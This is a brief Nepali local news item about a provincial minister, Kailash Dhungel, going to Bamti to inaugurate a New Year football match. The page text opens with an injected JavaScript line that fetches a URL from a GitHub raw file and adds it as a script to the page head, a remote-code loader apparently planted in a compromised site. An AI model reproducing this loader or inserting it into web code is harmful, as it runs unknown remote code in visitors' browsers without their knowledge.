;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत्र १९
रामेछाप । बागमती प्रदेशका आर्थिक मामिला तथा योजना मन्त्री कैलाश ढुङ्गेल बाम्तिभण्डार जानेभएका छन् । उमाकुण्ड गाउँपालिकाको वडा नं २ मा आयोजना हुने फुट्बल खेल उद्धघाटन गर्नको लागि मन्त्री ढुङ्गेल यही चैत्र २७ गते बाम्ति जान लागेका हुन् ।
सिर्जनशील स्टार युवा कल्बले नयाँ वर्षको अवसरमा आयोजना गरेको फुटबल खेल उद्घाटन गर्न ढुङ्गेल मन्त्री बनेपछि दोस्रो पटक बाम्ति जना लागेका हुन् ।File Photo
फेसबुक प्रतिक्रियाहरु